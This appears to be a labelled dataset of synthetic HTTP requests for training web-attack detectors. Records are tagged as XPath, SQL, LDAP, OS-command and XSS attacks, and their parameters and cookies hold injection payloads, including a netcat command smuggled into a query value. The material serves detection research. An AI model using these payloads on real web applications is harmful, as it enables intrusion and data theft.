Host: 59.131.148.1:80
Connection: keep-alive
Accept: */*
Accept-Charset: koi8-r;q=0.3, macintosh, iso-8859-2;q=0.8, utf-8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 214.70.1.175
Cookie: eTTanstng=n<lasi5re8;onWhnr=941;gke0=opt;I4Ld0avChttpkuv=r 7]fiphp lP;nllc=oreplacen
Cookie2: $Version="88"
Date: Wed, 15 Mar 06 06:36:04 UTC
ETag: "60KWnTBuO0WR3pn7X4Yx"
Expect: 100-continue
From: enle@ymn9end.uk
If-Modified-Since: Sat, 15 Apr 06 20:11:34 UTC
If-Unmodified-Since: Mon, 08 Feb 10 10:21:22 UTC
If-Match: "OocUsqj8sAMR@yi"
If-None-Match: "prp1@ZnKtJqfT@hxJWj"
If-Range: "CT8FV.6p_EE5..7"
Max-Forwards: 0
MIME-Version: 7.0
Pragma: in=eeY3titb
Proxy-Authorization: NTLM YmxvNHRwYW5pdHhhdTNhaGhpY3R0ZGg5c2luUm5kczVlZElzYWE=
Authorization: NTLM eWFDYXR0ZURUbXRuemE0YWRjcTVpZ2V1NGdoakhyN2pmZW9t
Range: -25100,-2
Referer: http://www.taa9t4.de/itopd.exe
TE: chunked;q=0.5,deflate,trailers
Trailer: If-Unmodified-Since
User-Agent: neY3jcencqrRIcslwet
UA-CPU: x86
UA-Disp: 307,4277,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 199x6158
Via: 3.9 www.rFugT.gif, 7.6 246.8.141.95, 1.0 140.154.200.30
Transfer-Encoding: identity
Upgrade: ogtr/7.3, ctr/1.8, dTuD/9.4, yoltsN/4.0, nt5ae/6.4
Warning: 755 www.rpcofa7.png "taotesry9p" 
X-Forwarded-For: 92.181.164.255
X-Serial-Number: 36797879465846791
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43558
Start - Id: 49723
class: XPathInjection
GET /6vFeygBw-Nq-lu4cAP-3/eGMZJsjW6.Y/hRWdft_x2E-n@caZB6V/tV3VkJ/yiwsnhpot7ytye/eW3EQ3/B4uuVf/nham/passwdn9uYa8ncU.jpg?xmltvbscriptUKWN@xgh.=4&LLO7FA=8&3rtmrosndi8Oi=iJ%27+++or+++%28i+%3C++++count%28tts%2Fchild%3A%3Atext%28%29%29+and++j+%3C+++++count%28r5aTIn%2Fchild%3A%3Acomment%28%29%29++and++k++%3C++count%28more%2Fchild%3A%3A*%29++++%29+++or+++%27oob%27+%3D++%27+e5C91k%27+++or HTTP/1.0
Host: www.lnhat.gov:80
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 173.103.247.250
Cookie: gahEzdoooegq=s0dYvreorI;rUClsC=o0;2sluh3eeoEo=08822
Cookie2: $Version="6"
Date: Sun, 07 Dec 08 01:07:21 UTC
ETag: "iITkPXqitf-bCHofqIg"
Expect: 100-continue
From: ejeriHt@tvteeteb.fr
If-Modified-Since: Fri, 07 Dec 07 19:25:54 UTC
If-Unmodified-Since: Tue, 01 Dec 09 21:27:34 GMT
If-Match: "9w1jVsfeOf0efabXwyI"
If-None-Match: "VuaXOkVV7MFNA4H"
If-Range: Sun, 14 May 06 10:21:04 GMT
Max-Forwards: 2678
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest cnonce="iest9re"
Authorization: NTLM bHdycmRnbWVyYXJzZXR0a28zOU0ybW1yZmVoZ3dlZXRw
Range: -5,-8543,85-24971
Referer: http://43ac8i2.biz/oeetl/izoaNzrC.mdb
TE: trailers
Trailer: Accept
User-Agent: mvtu8-JBTw http://www.rttdn.gov
UA-CPU: StrongARM
UA-Disp: 731,8185,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6094x1402
Via: 9.9 www.teez.gif, 6.7 www.wlycsnOx.js, 4.7 www.leys.png
Transfer-Encoding: deflate
Upgrade: 2sv/4.0, uetOn/7.3
Warning: 623 www.Cxer.gif "wenr" 
X-Forwarded-For: 235.101.74.70
X-Serial-Number: 9273829516846529
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49723
Start - Id: 48476
class: XPathInjection
GET /g7uFo4/snsakuebeEmry4Ami0/y0pe6u/imcea0/l7GCcxBb6dX-2n43/tyoA3Ht2OuC/lFM/5q47MJi22B/n@gP.jpg?uei3A2i3iwt=soeh HTTP/1.0
Host: 156.61.190.198:74575
Connection: keep-alive
Accept: application/x-tar, application/*
Accept-Charset: koi8;q=0.6, windows-874;q=0.0, windows-1250, windows-1251
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: udyx0='rI'
Client-ip: 8.102.172.5
Cookie: hag0rerH=uorcN9group by;E7c=ectSr'  or   (i   <    count(egyync/child::text())    and j   <     count(em/child::comment())    and   k    <   count(e7neel/child::*)    )  or   'hI'   =  '    uiX'  or;giehsaoxz=ebtsoaio6ljdnnhl4;oeercvuK63hfo=5476082;iw=515010;httpsgCj5i.276=sam
Cookie2: $Version="30"
Date: Sun, 20 Aug 06 18:00:51 CET
ETag: W/"Gut-jvWaQBWX@Xm"
Expect: 100-continue
From: xwmo0O@eRPai1tmd.cz
If-Modified-Since: Fri, 11 Apr 08 12:34:51 GMT
If-Unmodified-Since: Mon, 23 Nov 09 04:38:06 CET
If-Match: "BFRN4A-YGFvCA_H"
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: NTLM WXJtbGVyMW8wbGgyNGV0amNydGl0UnNyaHd1bGE0ZWdzc2E=
Authorization: ascU p5v3Nae=msekndfa
Range: -7206,3-30956,-92506
Referer: http://www.6rklei.net/darclc9/tfihhrez/Uxeee/Soys1.js
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/5.1 (Windows; U; Win98 0.0; n0-tI; rv:4.6.6) Gecko/56447388
UA-Disp: 6391,630,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1131x852
Via: 3.1 225.136.189.69
Transfer-Encoding: compress
Warning: 970 www.loschtan.shtml:1 "dISrElrc" "Sat, 01 Dec 07 05:56:12 GMT"
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48476
Start - Id: 50055
class: XPathInjection
POST /GTCbYmpsLhVfzxa/aBqYixoHFK63Gd/hlQ@QXxQZ/3m9u0M.cPi-b2ei/tRI0@GFSQ/p.U@6PrB1_33@VIzQOX/to5ne14xrTxiabriEla/roeno.tiff? HTTP/1.1
Content-Length: 188
Content-Language: r,fuu5drle,olpi
Content-Encoding: deflate
Content-Location: /feEs/OOahdnj/inhaoy/lpmwca.php
Content-MD5: YmRkaWU4aUlzOE1ub2lkcg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 23 Feb 07 17:18:05 GMT
Last-Modified: Sun, 30 Jul 06 06:09:09 GMT
Host: 158.213.145.143:8607
Connection: vahl
Accept: application/*;q=0.3, audio/*, video/quicktime;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: max-age=193
Client-ip: 219.186.60.132
Cookie: kuenteic4heycdm=1847;scse3sre=ca(;Sm=(i <   count(y7na/child::text())  and j     < count(duu4c/child::comment()) and     k    < count(tSed8/child::*)  );uE9mJBKEobject6=237
Cookie2: $Version="0"
Date: Fri, 09 Apr 04 11:31:31 UTC
ETag: W/"grDyonL111BU3dG-Vs3d"
Expect: 100-continue
From: dtlece@N4narCi.fr
If-Modified-Since: Tue, 18 Mar 08 24:46:57 GMT
If-Unmodified-Since: Thu, 15 Nov 07 10:18:31 UTC
If-Match: *
If-None-Match: *
If-Range: "3EYLdqTCO1bl6Zt"
Max-Forwards: 33
MIME-Version: 8.2
Pragma: Rm='naec4e'
Proxy-Authorization: Digest uri=http://eeL9o.uk/imdA7.php4
Authorization: NTLM YWZlb3V1a2hlZ3MzcGh0bmNvdGhRNnRzaHNlZG91dG8=
Range: 52839-,942-53,-81200
Referer: http://www.daeo5s.fr/emavyelo.php3
TE: chunked;q=0.4,trailers
Trailer: Transfer-Encoding
User-Agent: 9vxa3be (hSLiO-rGPz; r9eUK4u6)
UA-CPU: 68000
UA-Disp: 086,0919,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3705x532
Via: 2.9 35.109.160.194, FTP/1.7 251.243.255.32:3, FTP/4.9 174.118.184.59:628
Transfer-Encoding: gzip
Upgrade: 6Kna1/5.3
Warning: 633 118.107.47.29 "ehmrqron" "Sun, 16 Apr 06 02:34:14 GMT"
X-Forwarded-For: 78.250.5.71
X-Serial-Number: 34243313236496
----: ---------------------------
~~~~~: ~~~~~~~~~~~

tnnootdes=osfusnzlxeoeAtpt&2szzte4ors4t63=8979991&ihhA=of tntoeEo&rtransoiLrt=We n&epssebfhego=76&eEqQnefdu=85276&lasoee=imghsnahneh~toiesqCbs&cnaisteYVgoCye5=sau+ne[bjIs/rafdeo'

End - Id: 50055
Start - Id: 35878
class: XPathInjection
GET /54@EgJgugM67hmh/brJ/i-0AJU@zk_UkT7lS/ct3KZqEKElpPrhd6/aso6gaidHa8el5a242u/tCQgfTJFQYicr86k/gnhp3fa5ezqjr6Eemc/7GAGCALyvDZ-.x@.asp?oce=bZ5IjQEET&@XpassthruWL3=736352&3ohL1syia=7hl%5Cuhsq%3F%40update9ebfgmailws&1wmeztn=v6T&nhmdeyihSy=71941+++++or++++cn%2FtAey%2FSitsir%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D2%5D+or+++++50284%3D&ru6ris=1G.l- HTTP/1.0
Host: 110.136.190.17
Connection: us1wlNnn
Accept: image/jpeg, image/*;q=0.6, text/plain
Accept-Charset: *
Accept-Encoding: gzip, gzip;q=0.2, identity;q=0.6, deflate;q=0.3, identity
Accept-Language: mz6-o;q=0.8, svEsu8-1Iledu, uonsOi7-ofldan;q=0.9, sqxtulu-nomar;q=0.0
Cache-Control: no-cache
Client-ip: 31.139.167.30
Cookie: l0ysttdtsneOyoe=tquPwP
Cookie2: $Version="19"
Date: Mon, 14 Jul 08 13:31:20 CET
ETag: "j6_RBDMJQV7b5lSDIfdF"
Expect: 100-continue
From: suitS@oroHhO.fr
If-Modified-Since: Thu, 11 Mar 04 03:50:24 UTC
If-Unmodified-Since: Fri, 07 Mar 08 01:27:04 GMT
If-Match: "j6Rux0wYcW_xhFcn"
If-None-Match: "EnCVkpN1KDDdc_lP-"
If-Range: *
Max-Forwards: 005
MIME-Version: 4.5
Pragma: 7aahxii=ghordt
Proxy-Authorization: Digest nonce
Authorization: fnr1a evaef=tkiEpein
Range: 39-2,823566-5763
Referer: http://www.nelE.ch/soa4nl.php3
TE: trailers
Trailer: If-Match
User-Agent: t5.mLs http://www.tm6hst.st
UA-Disp: 7612,056,16
UA-OS: Linux
UA-Color: color32
Via: FTP/3.5 239.31.104.210
Transfer-Encoding: identity
Upgrade: hic/2.2, m8rwk1/9.9
Warning: 683 214.32.116.161 "fdrit" "Thu, 11 Jun 09 24:41:37 GMT"
X-Serial-Number: 160475
----: ----------------------------

null

End - Id: 35878
Start - Id: 43249
class: OsCommanding
GET /9xmlTHBpcHrj_Zu/access_logpositionL5BKfrom8hJWxkG1/v./gwe02jrOavdAn9fhone/iQ54jlqIQ/btulhr8l9lE/wz0BVCiN1p5f4vqiMXN/4SFUzmC-eQpQLn4Lt/eBc8@8/4o2oimim4peDD7c.cgi?npatermoed=1072895486&tec=41&egSjM_Yg=oK3GXMr&aeonctudggnnc=it&rmdjoahntpgps=ei%3CisE%7Ero+c&tlei4nesh=%250a+nc+++www.neol.com+++++80+%3B HTTP/1.0
Host: 142.27.131.30:80
Connection: close
Accept: image/jpeg, image/jpeg, application/*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 92.41.242.45
Cookie: bndeleteZ6hiwQ=r2x65zqga;bM3matdse9n=s cQ+w;KFIperl=n2EQYeyh;13o3t6wdznoio=bsi;TkWis8Y=uzRm3341T;eMr=gnxTIBX
Cookie2: $Version="143"
Date: Fri, 10 Mar 06 21:53:53 GMT
ETag: W/"4OevjYPAXE2q_Wfy7"
Expect: 100-continue
From: w5itei@2re1ofAi.st
If-Modified-Since: Mon, 07 Mar 05 11:27:56 CET
If-Unmodified-Since: Sun, 13 May 07 19:29:37 UTC
If-Match: "kcfwk.AaWxjtk@RI"
If-None-Match: "KNpOLxGzqwDX@7YWDblS"
If-Range: "l0pAPpZ6Jl5hp_2Tg"
Max-Forwards: 539
MIME-Version: 8.0
Pragma: efro='teo'
Proxy-Authorization: Digest response="0B3cEb0aBbFc900Db7cC68fE50d55Ca6"
Authorization: Basic SnRiYTdjMHI6MmRnYWN0
Range: 6235-,3-
Referer: /ostlebN/lra51er/siL0tI9o/desihp.php3
TE: trailers,chunked;q=0.6,trailers
Trailer: If-Range
User-Agent: t@LsCM http://www.Nr3lsbos.be
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 115x099
Via: 8.6 156.239.180.64, 1.0 241.183.71.200:3
Transfer-Encoding: identity
Upgrade: nedg/4.6, yodj/9.6
Warning: 865 www.tCxceo.shtml "dydtrSr7Wtth" "Fri, 09 Jul 04 12:15:54 GMT"
X-Forwarded-For: 228.91.246.96
X-Serial-Number: 855673274232810386
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43249
Start - Id: 49210
class: XPathInjection
GET /ftpaxp_wvOnzSG1uperlo/srltt3eAdW5ovpo/nrrdno9/hXLdropkO5/79nwefeoqeTbjlfn/tt@h4q/aSTR/gLNdneupHnctmanaeea/anol/iNy3mR1n9p-.msf?a8egs=o.h5_VRyxbT&inlidBt=3&euceocesa2aan=74156&hilc=tedn%2F2ebra%2Fj7hz%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D2%5D++or++++%27ln%27++%3D++++%27&aycr=reat%2Bamdpioe&chnIt4Tnh=sr&rznlp4i=680&Jvn2JW=ooczusrrnn0dwmnohS HTTP/1.0
Host: www.jxriglfuiE.be
Connection: inosioen
Accept: */*;q=0.3
Accept-Charset: windows-1258, windows-874, windows-1258, x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: irylh-s;q=0.1, dotyiee-Yt;q=0.5, eT-aue1cdiU;q=0.5
Cache-Control: max-age=268
Client-ip: 107.0.134.67
Cookie: dyRecrlnddaulH=ontaieah;5XZcR=formAusA=n4plwot;LNB@PQEUUvu=e(nf;cvrh6eds=>);hdm=3;sMb5oyocnp=046918
Cookie2: $Version="19"
Date: Wed, 09 Jun 04 03:54:38 CET
ETag: W/"PMFtKm7M45ftXYT2iM8i"
Expect: h28tt
From: lCae@ni91.be
If-Modified-Since: Tue, 20 Jun 06 07:08:49 GMT
If-Unmodified-Since: Sun, 04 Oct 09 16:17:47 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 24 Apr 08 20:09:51 CET
Max-Forwards: 4163
MIME-Version: 6.8
Pragma: k0a='ePnsE'
Proxy-Authorization: Basic MWd0YTpydGplZWl3
Authorization: Digest nonce
Range: -392691
Referer: http://www.6ctdDN5x.com/lneSevs/aa8oths/oaSwae/uroqaiyp.nsf
TE: gzip;q=0.4,gzip,trailers
Trailer: Authorization
User-Agent: Dls0assaeT/3.1
UA-CPU: 68000
UA-Disp: 2354,727,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 6245x946
Via: 8.2 25.152.84.181, 2.1 135.117.29.145, FTP/4.0 230.172.96.139
Transfer-Encoding: aofh
Upgrade: wtrfa/2.8, tto/9.5, nvs/5.2
Warning: 724 17.92.63.205 "uiDhIxbYiobgTemr" "Thu, 31 Jul 08 08:16:12 CET"
X-Forwarded-For: 243.220.220.113
X-Serial-Number: 094897870
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 49210
Start - Id: 36918
class: LdapInjection
PUT /2edppnipd0ynto/re2Oedaetysiarsr/eTSlA@Z_xXWxqclrJh.asp? HTTP/1.1
Content-Length: 320
Content-Language: kfmaa
Content-Encoding: identity
Content-Location: http://ceknlois.fr/sqea0oAc/aint/raacd/mcHt.gif
Content-MD5: b3NhdG91aWVwaXphdWVmZA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 Sep 05 18:44:20 GMT
Last-Modified: Fri, 04 Dec 09 11:32:05 UTC
Host: www.sdddd.com
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, identity;q=0.1, gzip;q=0.5, gzip;q=0.9
Accept-Language: znaaoeEe-ro, Eew-iwisit
Cache-Control: no-cache
Client-ip: 23.24.154.22
Cookie: ujYbKx=kqho 
Cookie2: $Version="09"
Date: Sat, 02 Jan 10 08:52:10 UTC
ETag: W/"Kz7Dmc-HYJYpwWQd6ii"
Expect: 100-continue
From: dhafadn@folsiatle.com
If-Modified-Since: Fri, 18 Jan 08 07:32:28 GMT
If-Unmodified-Since: Sun, 22 Mar 09 13:07:45 GMT
If-Match: "SqEw28g1znnBLeF4MU"
If-None-Match: *
If-Range: Sat, 19 Sep 09 21:57:07 UTC
Max-Forwards: 928
MIME-Version: 8.8
Pragma: xpmpsct='soeAsaos'
Proxy-Authorization: NTLM cmVlZXRyZWdpYWJlb3N0ZUFPdGd6bm85Ym5jbndpdG5jc2Vxc2J1YVNlcg==
Authorization: Digest algorithm=MD5-sess
Range: 03-
Referer: http://www.strssq.com/nemiyr/ab7sexa/i6lywit.html
TE: trailers,gzip;q=0.5
Trailer: If-Match
User-Agent: idnltiltouswaaht
UA-CPU: Sparc
UA-OS: Win98
UA-Pixels: 015x0585
Via: 0.9 www.4sseen6y.css:88198, FTP/9.2 www.tatane.css
Transfer-Encoding: gzip
Upgrade: i66/6.1
Warning: 029 17.241.6.13:76 "8tya4sneebfR" "Fri, 14 Mar 08 05:58:01 GMT"
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

8ueTpewiuesr6g3=35&nz=877&s0=Tsisd)(&(objectClass=  Ap*)&diJiwh=P &o|@i&RmLA@=crRs2ea&tpatEtna=homeosn&a2=ahil>bd@'tandt@tr&e3oLn=3&nsnprek8tau=58&daoubdadtsEmti=bd:0auRarmtbe@open&Amkrst4jbo2iH=rUce&pmqhrt=td:b&CeLchildousr=EeExr76mjrEahbshhe&xoWnao0rets8nid=33251692&l6PreANP=hincludelu

End - Id: 36918
Start - Id: 42361
class: SqlInjection
GET /hDkJd@Tq/itnPPM_qXTkL/SMqTo/pED78fhcL_/OltrZQM2d/nehNeimqzil65e/aYhtPk5wRqBr5oy/hual1/oV1SmRKMrB.Jfdbjy/iyEl6d.ISAHd.css?yldTs=%27+++%29+UNION+++++ALL++++SELECT++++02+++FROM+e4raasarl++++WHERE++++%28+%27%27++%3D%27&ttFibrmam=ttcrhAmt&mdd6c=3Fjy_6v&ks3e4ohnatar=55826551&9V5N7X2m=t%27hohrcphsa&hcgEt=u%26le&gsAd6passwdi=2V08A.ev9d4&eetaa16=rnetsesg HTTP/1.0
Host: 20.205.202.78
Connection: keep-alive
Accept: application/x-tar;q=0.3
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 254.246.251.197
Cookie: meytstvx=locationsrincludeselect-=open6lwindow.opener;aoy3ststar=41;snlOblAhsNG6=dlikesock_streamex;pwc2ctCdEewr=IeHomzy
Cookie2: $Version="89"
Date: Mon, 21 Aug 06 13:03:50 GMT
ETag: ".pHQcBCpLNiI3Vv"
Expect: 100-continue
From: ttyr@nt7thnt6um.uk
If-Modified-Since: Sat, 02 Aug 08 03:17:45 GMT
If-Unmodified-Since: Wed, 24 Aug 05 02:43:40 UTC
If-Match: "wk6-mORo9SeNl-IKMyq"
If-None-Match: "f-1U4MQ5PQ4AqgK"
If-Range: Sat, 01 Sep 07 17:53:44 CET
Max-Forwards: 400
MIME-Version: 2.3
Pragma: 0crr='iEivoT'
Proxy-Authorization: dlmr slzlneo=pHmge92s
Authorization: NTLM ZWRwZWhhc2Fhbm51aXdxRWVvZWloZXRhZUpxYWVlbnJl
Range: -966,396-333,-3990
Referer: http://oDwrh.it/nDsWivTo/dghditti/e0eTil/msiD/eitaEah.css
TE: chunked;q=0.3
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.8 (Windows; U; WinNT 5.2; iE-sg; rv:9.8.7) Gecko/70916053
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 180x738
Via: 3.7 252.43.16.106, HTTP/1.2 www.iteesn.js, 5.8 www.i2srntet.gif
Transfer-Encoding: igbn3e
Upgrade: ioA/2.2, sl6sg/1.0
Warning: 423 132.125.191.161:87 "rdoiorrnoghcct9sL6ci" 
X-Forwarded-For: 171.143.1.2
X-Serial-Number: 71261
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42361
Start - Id: 42382
class: SqlInjection
GET /VmCEjQHT9crdc/sKoXPx/t_fv645E0UafXt/e8S@/nu2wvB.shtml?mtiM9a=iRmMqWQ1l&N_qrhEeF=%27++or+id+++++in++%28++++select+++*++from++++++user_db+++%29 HTTP/1.1
Host: www.e6el.de
Connection: crni
Accept: */*;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: compress;q=0.7, deflate, identity;q=0.3, deflate;q=0.7, gzip;q=0.0
Accept-Language: *
Cache-Control: min-fresh=765
Client-ip: 237.97.207.139
Cookie: hMmihrnnHiimS=weaziugd9ol8uiie;f5nimdd3=o T;tlLxui=1JbQZOX0bwr6;shetae6rhErs=7804
Cookie2: $Version="17"
Date: Sat, 03 Jun 06 16:56:08 CET
ETag: "tN-IZ4t1Xvz3PGGu4c"
Expect: adsnMlj
From: nU8g@Ctnnlleoe.st
If-Modified-Since: Sun, 18 Dec 05 03:49:48 GMT
If-Unmodified-Since: Tue, 17 Jun 08 16:05:21 CET
If-Match: "qG47FfE4aKck@72A"
If-None-Match: *
If-Range: "xTzakPSmG.D.Q2WIE"
Max-Forwards: 3914
MIME-Version: 9.3
Proxy-Authorization: qceto diof8g=camemest
Authorization: oeifa renlcmT=aansato
Range: -58,988-4242
Referer: /erte/w4arhdm/fdtni.js
TE: trailers
Trailer: Cache-Control
User-Agent: 6epME/8.3.1.9.2
UA-CPU: StrongARM
UA-Disp: 8289,132,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3589x325
Via: 0.8 80.34.36.102, 4.9 www.bxhehetn.html:0749
Upgrade: TyteS/4.7, iaa/1.6, irg/7.1, 8lsno/4.8, era/0.2
Warning: 574 57.17.46.185 "veun9pelul" 

null

End - Id: 42382
Start - Id: 42235
class: SqlInjection
GET /gA7agWtU5p/rsc6HgxGoafzO0QV/tUpu-qjqozpE7P77/Ebtxk/IVnetcatinputchildhtacces/pussfS7oLkiheTomrs/oejm2cgk55.dll?mvdTiohaalle=uCDIU.&9n9tmdbiihn=ntlesOsamt2&tm0M3hlav=%27%3B+insert++++into+++oeaaarwN++++values%28666%2C%27nrdeNe%27%2C%27aiun5i%27%2C0xfffff%29 HTTP/1.1
Host: www.erunnp.ch
Connection: oyy3eses
Accept: image/*;q=0.8, video/mpeg;q=0.6
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: isc-a5l, fea-suEy, ou-Ra
Cache-Control: max-age=5
Client-ip: 104.162.121.20
Cookie: dweNlgFernm8n=sqJXn;aliD=yhngiOjax
Cookie2: $Version="4"
Date: Sat, 26 Nov 05 10:53:09 UTC
ETag: W/"CiOMcgIzuC1vcR3"
Expect: tdaRtn=awSs;tdeecu=rppo
From: i044@nteicVy.it
If-Modified-Since: Wed, 28 Feb 07 07:23:37 GMT
If-Unmodified-Since: Sat, 09 Jan 10 20:37:27 UTC
If-Match: *
If-None-Match: "pE5vuocWuvH@ahSQ-hPZ"
If-Range: Fri, 06 Oct 06 11:33:16 GMT
Max-Forwards: 26
MIME-Version: 1.3
Pragma: tlgh='7seaeit9'
Proxy-Authorization: NTLM M2FlbzFvd2R2amFoamFybnhjcWx1dXRkMXZhOXhMaXRtbmtzc2RPYXBl
Authorization: NTLM ZTlvYW1zYXRpRThvdGx2dzhlaWVzYW9pb2JjcnNkbHdFc2k0b3U4bTN5ZGVz
Range: 4539-14148,-19,934-
Referer: /acoydrE/eEyg/tiryfsot/tme2eeAi/sio0.asmx
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.0 (Windows; U; Windows NT 2.2; Te-oh; rv:0.5.7) Gecko/23068061
UA-CPU: x86
UA-Disp: 378,9839,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 108x2342
Via: 8.3 26.39.13.111, 9.5 216.245.3.127
Transfer-Encoding: eeso; hsbs=saryo8
Upgrade: iunoNg/9.6
Warning: 805 www.oCYoru.jpg "crToo" "Wed, 13 Feb 08 17:50:20 GMT"
X-Forwarded-For: 3.212.183.96
X-Serial-Number: 8756384538065662
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42235
Start - Id: 48874
class: XPathInjection
GET /qdajes1atzl/FjCm/rpEdyQx/rsi9tdeT/tPp-7MULvQ1GVml.c/mtnedjuca6mloyt/f0JCN/i5lepes55ooiaein/elSs34ff.js?bSzdns1CJte=te&rPic1raisashtFb=866++or++1%3C++++bsa2%2Feva9%2Feft%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D949%5D++++or+++4%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&l2=k8erobga7+ HTTP/1.0
Host: www.trisne.st
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: min-fresh=9624
Client-ip: 81.197.139.145
Cookie: 2ioitOcht=549837;emrbcaoen=a/Cimg;qXaaqers=tp@t[itwnodeeane;rooV;Ahme=-tg;jluIpeosedo=sMXxmy-_a.R
Cookie2: $Version="7"
Date: Sat, 09 Feb 08 03:28:16 GMT
ETag: "_fRV_D@7oKn-qsK"
Expect: pn2woe=ie1ahhBi;mteS=ystbokt
From: tT6sz@uCil5yEad.be
If-Modified-Since: Sat, 29 May 04 05:16:03 GMT
If-Unmodified-Since: Fri, 04 Apr 08 07:33:32 CET
If-Match: "OmvY9aw7c7.ClNgeS6I"
If-None-Match: "RZt2ncEPb9yewnPnIlh"
If-Range: "hsaKUdER7sifUYoD3C"
Max-Forwards: 612
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic aHdmYTY6RXk3aw==
Authorization: Basic aTJoaGxzbmI6ZW51cmxkaQ==
Range: 03033-94733
Referer: /Czl3r/egs3cs.wav
TE: trailers,trailers,gzip
Trailer: Accept-Charset
User-Agent: oeevh9 (nXunPEo.hX)
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1420x8323
Via: 1.9 30.139.77.167
Transfer-Encoding: compress
Upgrade: cntr/0.2, fRir/4.0, qalsS/7.9
Warning: 954 www.ilczoa.gif:1 "ja32a5uE" 
X-Forwarded-For: 156.103.50.172
X-Serial-Number: 3294435
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48874
Start - Id: 48138
class: XSS
GET /6rxse.shtml?oa=7377&lrihgesze6k=iWGsazM8&tettgqfgooh=D3Oh4iTstdintikl&dspnF8aaa4=ai&atAnEcOEefiesti=cZHknOv&5lnheS5elaCa=%3Cstyle++type++%3D+++%22++++text%2Fjavascript++++%22%3E%5Balert++++%28%27ittvdES%27%29%3B%5D%3C%2Fstyle%3E HTTP/1.1
Host: 55.196.97.66
Connection: close
Accept: audio/*;q=0.7, image/*
Accept-Charset: iso-8859-7, x-mac-turkish;q=0.9, windows-1258
Accept-Encoding: 
Accept-Language: f-re7sNap;q=0.2, iebuA8ea-8roaoop6, gda-h4dyrp;q=0.6, ene0oa-deTjtt56;q=0.6
Cache-Control: no-store
Client-ip: 34.160.166.92
Cookie: seqmiaqiij=8236194;az2r=mc5a;Gupdate6RX6emailD=fLe;kUQTieJ=l4iXjF.pCB
Cookie2: $Version="98"
Date: Wed, 07 Jan 09 15:05:02 GMT
ETag: W/"dP0f@L8t3uYSaQ2"
Expect: fh2IAlI=egbfsrrd
From: terhoe3@ygfzae.st
If-Modified-Since: Sun, 08 Aug 04 07:26:33 UTC
If-Unmodified-Since: Tue, 25 Apr 06 23:49:44 UTC
If-Match: *
If-None-Match: *
If-Range: "_sQzlgpRyjqlMrtJz"
Max-Forwards: 01
MIME-Version: 8.0
Pragma: yv=edweu
Proxy-Authorization: Digest realm
Authorization: Basic NGRuSDpjb3Rj
Range: 4-,0-614
Referer: /wseha3ud/hsee8dOq/dhtn/eNAr.php
TE: trailers,deflate;q=0.1,trailers
Trailer: Accept
User-Agent: Mozilla/7.4 (Machintosh; U; PPC 1.2; td-ar; rv:3.8.0) Gecko/65829908
UA-CPU: Sparc
UA-Disp: 121,8495,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 8071x836
Via: FTP/3.2 www.ohdudahd.jpg
Transfer-Encoding: identity
Upgrade: ahrnb/9.3, dedEnm/2.8, Knaee1/4.9, betzh/8.1, EaMe1a/1.8
Warning: 452 www.beld.html "tgngho80ui" "Tue, 29 Jun 04 10:36:42 GMT"
X-Forwarded-For: 72.155.7.72
